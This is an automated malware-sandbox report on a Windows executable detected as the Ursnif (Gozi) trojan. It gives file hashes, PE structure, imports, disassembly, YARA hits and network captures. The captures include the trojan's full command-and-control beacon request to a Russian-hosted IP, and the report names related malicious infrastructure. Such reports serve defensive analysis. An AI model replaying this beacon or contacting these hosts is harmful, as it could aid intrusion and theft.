http://94.103 | server.exe, 00000000.00000002.569377745.00000000027FC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low

Reputation legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
62.173.142.51 | unknown | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
94.103.183.153 | unknown | Russian Federation | 197390 | RATELE-ASRU | false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 826138
Start date and time: 2023-03-14 12:25:09 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: server.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@1/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 69.7% (good quality ratio 67.8%)
• Quality average: 82.1%
• Quality standard deviation: 26.5%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 39
• Number of non-executed functions: 38
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: server.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          62.173.142.51server.exeGet hashmaliciousUrsnifBrowse
            server.exeGet hashmaliciousUrsnifBrowse
              server.exeGet hashmaliciousUrsnifBrowse
                94.103.183.153server.exeGet hashmaliciousUrsnifBrowse
                  server.exeGet hashmaliciousUrsnifBrowse
                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
RATELE-ASRU | server.exe | Get hash | malicious | Ursnif | Browse | 94.103.183.153
RATELE-ASRU | server.exe | Get hash | malicious | Ursnif | Browse | 94.103.183.153
RATELE-ASRU | https://drugfreesport.info/lqb4s | Get hash | malicious | Phisher | Browse | 94.103.183.131
RATELE-ASRU | file.exe | Get hash | malicious | Amadey, Raccoon Stealer v2, RedLine | Browse | 94.103.183.33
RATELE-ASRU | tdmGGmdqKV.exe | Get hash | malicious | RedLine | Browse | 94.103.183.33
RATELE-ASRU | Zqtx6ddArE.exe | Get hash | malicious | RedLine | Browse | 94.103.183.33
RATELE-ASRU | boatnet.arm7.elf | Get hash | malicious | Unknown | Browse | 94.103.188.36
RATELE-ASRU | boatnet.x86.elf | Get hash | malicious | Unknown | Browse | 94.103.188.36
RATELE-ASRU | boatnet.arm.elf | Get hash | malicious | Unknown | Browse | 94.103.188.36
RATELE-ASRU | file.exe | Get hash | malicious | RedLine | Browse | 94.103.183.197
RATELE-ASRU | file.exe | Get hash | malicious | RedLine | Browse | 94.103.183.197
RATELE-ASRU | AvS8aoWXxI.exe | Get hash | malicious | RedLine | Browse | 94.103.183.219
RATELE-ASRU | vdBv52v29c.elf | Get hash | malicious | Mirai | Browse | 94.103.188.36
RATELE-ASRU | lz47Kwn9w4.elf | Get hash | malicious | Mirai | Browse | 94.103.188.36
RATELE-ASRU | untODBSHdU.elf | Get hash | malicious | Mirai | Browse | 94.103.188.36
RATELE-ASRU | 2D6T4RxWsP.elf | Get hash | malicious | Mirai | Browse | 94.103.188.36
RATELE-ASRU | 4ISX4nRn8l.elf | Get hash | malicious | Mirai | Browse | 94.103.188.36
RATELE-ASRU | b2dbec9d623300bf09f55ec179a2b5e4cd5a4c6cea7a5.exe | Get hash | malicious | RedLine | Browse | 94.103.183.119
RATELE-ASRU | BKrhxR1U4N.exe | Get hash | malicious | RedLine | Browse | 94.103.183.119
RATELE-ASRU | 10A647A3727CA36B57126F6F8985EEE82A511DE435180.exe | Get hash | malicious | RedLine | Browse | 94.103.183.121
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.142.51
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.142.51
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.142.51
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.236
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.236
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.236
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.141.36
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.141.36
SPACENET-ASInternetServiceProviderRU | lQj2udnlAj.exe | Get hash | malicious | Ursnif | Browse | 62.173.141.36
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.141.36
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.138.6
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.138.6
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.138.6
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
SPACENET-ASInternetServiceProviderRU | server.exe | Get hash | malicious | Ursnif | Browse | 62.173.140.103
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.726307472466791
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 91.23%
                    • Win32 Executable Borland Delphi 7 (665061/41) 6.07%
                    • Win32 Executable Borland Delphi 6 (262906/60) 2.40%
                    • Win32 Executable Delphi generic (14689/80) 0.13%
                    • Windows Screen Saver (13104/52) 0.12%
                    File name:server.exe
                    File size:616960
                    MD5:43cfce2e126b1bf5230e51edd205f6bd
                    SHA1:9ca60bfc3cb13b40f02810869ce9531cb0ab76d4
                    SHA256:47d288233a39a68396567e35a77a500e296218df3a4bc9daca797e75b4b03d4b
                    SHA512:72f203491fab6d44c9f2466b877af56929ba8f24b136b2b706265605e529774efa82bc97b6967791a5d6cd294712667b9a470e543051caa10beb3a73bbab7b78
                    SSDEEP:12288:pAP6umkdcE8lZqRpTy2TTHoKKob0xW7//PExk+eVPeYm:Ky0H8lZqRZy4IsHMpeVPq
                    TLSH:2FD46C23A2F14437D17717789C7B9766583ABE102E38A88A2BE42D4C4F3D69139753E3
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                    Icon Hash:b99988fcd4f66e0f
                    Entrypoint:0x476dac
                    Entrypoint Section:CODE
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:c180eab77990cded75f412955c2aa3af
                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFECh
                    xor eax, eax
                    mov dword ptr [ebp-14h], eax
                    mov eax, 00476AFCh
                    call 00007F7CFCA5A25Ch
                    xor eax, eax
                    push ebp
                    push 00476E2Dh
                    push dword ptr fs:[eax]
                    mov dword ptr fs:[eax], esp
                    mov eax, dword ptr [00478AACh]
                    mov eax, dword ptr [eax]
                    call 00007F7CFCAAE50Eh
                    lea edx, dword ptr [ebp-14h]
                    mov eax, dword ptr [00478AACh]
                    mov eax, dword ptr [eax]
                    call 00007F7CFCAAEBA7h
                    mov eax, dword ptr [ebp-14h]
                    cmp byte ptr [eax+03h], 0000006Dh
                    je 00007F7CFCACAB1Ah
                    mov ecx, dword ptr [00478C4Ch]
                    mov eax, dword ptr [00478AACh]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [004762D4h]
                    call 00007F7CFCAAE4F6h
                    mov eax, dword ptr [00478AACh]
                    mov eax, dword ptr [eax]
                    call 00007F7CFCAAE56Ah
                    xor eax, eax
                    pop edx
                    pop ecx
                    pop ecx
                    mov dword ptr fs:[eax], edx
                    push 00476E34h
                    lea eax, dword ptr [ebp-14h]
                    call 00007F7CFCA57E71h
                    ret
                    jmp 00007F7CFCA577EBh
                    jmp 00007F7CFCACAAF2h
                    call 00007F7CFCA57CF0h
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7a000 | 0x22ea | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x89000 | 0x12e00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x93a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x7e000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x75e3c | 0x76000 | False | 0.5166139764300848 | data | 6.558727650455389 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x77000 | 0x1d48 | 0x1e00 | False | 0.42109375 | data | 4.29996788400184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x79000 | 0xcd9 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x7a000 | 0x22ea | 0x2400 | False | 0.3569878472222222 | data | 4.9532912812050425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x7d000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x7e000 | 0x18 | 0x200 | False | 0.048828125 | data | 0.2005819074398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x7f000 | 0x93a8 | 0x9400 | False | 0.5329919763513513 | data | 6.614677812315155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x89000 | 0x12e00 | 0x12e00 | False | 0.6307300289735099 | data | 6.594926097852816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x89d20 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001"
RT_CURSOR | 0x89e54 | 0x134 | data
RT_CURSOR | 0x89f88 | 0x134 | data
RT_CURSOR | 0x8a0bc | 0x134 | data
RT_CURSOR | 0x8a1f0 | 0x134 | data
RT_CURSOR | 0x8a324 | 0x134 | data
RT_CURSOR | 0x8a458 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001"
RT_BITMAP | 0x8a58c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8a75c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380
RT_BITMAP | 0x8a940 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8ab10 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8ace0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8aeb0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8b080 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8b250 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8b420 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8b5f0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP | 0x8b7c0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128
RT_ICON | 0x8b8a8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_DIALOG | 0x8bb90 | 0x52 | data
RT_STRING | 0x8bbe4 | 0xec | data
RT_STRING | 0x8bcd0 | 0x42c | data
RT_STRING | 0x8c0fc | 0x434 | data
RT_STRING | 0x8c530 | 0x330 | data
RT_STRING | 0x8c860 | 0x4cc | data
RT_STRING | 0x8cd2c | 0x3e4 | data
RT_STRING | 0x8d110 | 0x388 | data
RT_STRING | 0x8d498 | 0x440 | data
RT_STRING | 0x8d8d8 | 0x554 | data
RT_STRING | 0x8de2c | 0x434 | data
RT_STRING | 0x8e260 | 0x510 | data
RT_STRING | 0x8e770 | 0x1e4 | data
RT_STRING | 0x8e954 | 0x1a4 | data
RT_STRING | 0x8eaf8 | 0x11c | data
RT_STRING | 0x8ec14 | 0x2b8 | data
RT_STRING | 0x8eecc | 0xe0 | data
RT_STRING | 0x8efac | 0x12c | data
RT_STRING | 0x8f0d8 | 0x290 | data
RT_STRING | 0x8f368 | 0x40c | data
RT_STRING | 0x8f774 | 0x37c | data
RT_STRING | 0x8faf0 | 0x3d4 | data
RT_STRING | 0x8fec4 | 0x250 | data
RT_STRING | 0x90114 | 0xec | data
RT_STRING | 0x90200 | 0x1dc | data
RT_STRING | 0x903dc | 0x3ec | data
RT_STRING | 0x907c8 | 0x3f4 | data
RT_STRING | 0x90bbc | 0x30c | data
RT_STRING | 0x90ec8 | 0x328 | data
RT_RCDATA | 0x911f0 | 0xa604 | data | English | United States
RT_RCDATA | 0x9b7f4 | 0x10 | data
RT_RCDATA | 0x9b804 | 0x394 | data
RT_RCDATA | 0x9bb98 | 0x18d | Delphi compiled form 'TForm1'
RT_GROUP_CURSOR | 0x9bd28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bd3c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bd50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bd64 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bd78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bd8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR | 0x9bda0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON | 0x9bdb4 | 0x14 | data | English | United States
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharLowerA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/14/23-12:27:29.882824 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2023 12:27:29.824017048 CET | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Mar 14, 2023 12:27:29.882249117 CET | 80 | 49685 | 62.173.142.51 | 192.168.2.4
Mar 14, 2023 12:27:29.882410049 CET | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Mar 14, 2023 12:27:29.882823944 CET | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Mar 14, 2023 12:27:29.941139936 CET | 80 | 49685 | 62.173.142.51 | 192.168.2.4
Mar 14, 2023 12:27:29.941441059 CET | 80 | 49685 | 62.173.142.51 | 192.168.2.4
Mar 14, 2023 12:27:29.941647053 CET | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Mar 14, 2023 12:27:29.944274902 CET | 49685 | 80 | 192.168.2.4 | 62.173.142.51
Mar 14, 2023 12:27:30.002386093 CET | 80 | 49685 | 62.173.142.51 | 192.168.2.4
Mar 14, 2023 12:27:49.975713015 CET | 49686 | 80 | 192.168.2.4 | 94.103.183.153
Mar 14, 2023 12:27:52.990417957 CET | 49686 | 80 | 192.168.2.4 | 94.103.183.153
Mar 14, 2023 12:27:58.994245052 CET | 49686 | 80 | 192.168.2.4 | 94.103.183.153
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2023 12:26:09.669512987 CET | 62577 | 53 | 192.168.2.4 | 8.8.8.8
Mar 14, 2023 12:26:09.698645115 CET | 53 | 62577 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 14, 2023 12:26:09.669512987 CET | 192.168.2.4 | 8.8.8.8 | 0x83d8 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 14, 2023 12:26:09.698645115 CET | 8.8.8.8 | 192.168.2.4 | 0x83d8 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
                    • 62.173.142.51
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49685 | 62.173.142.51 | 80 | C:\Users\user\Desktop\server.exe
Timestamp | kBytes transferred | Direction | Data
Mar 14, 2023 12:27:29.882823944 CET | 93 | OUT | GET /drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                    Host: 62.173.142.51
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Target ID:0
                    Start time:12:26:00
                    Start date:14/03/2023
                    Path:C:\Users\user\Desktop\server.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\server.exe
                    Imagebase:0x400000
                    File size:616960 bytes
                    MD5 hash:43CFCE2E126B1BF5230E51EDD205F6BD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.446824514.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
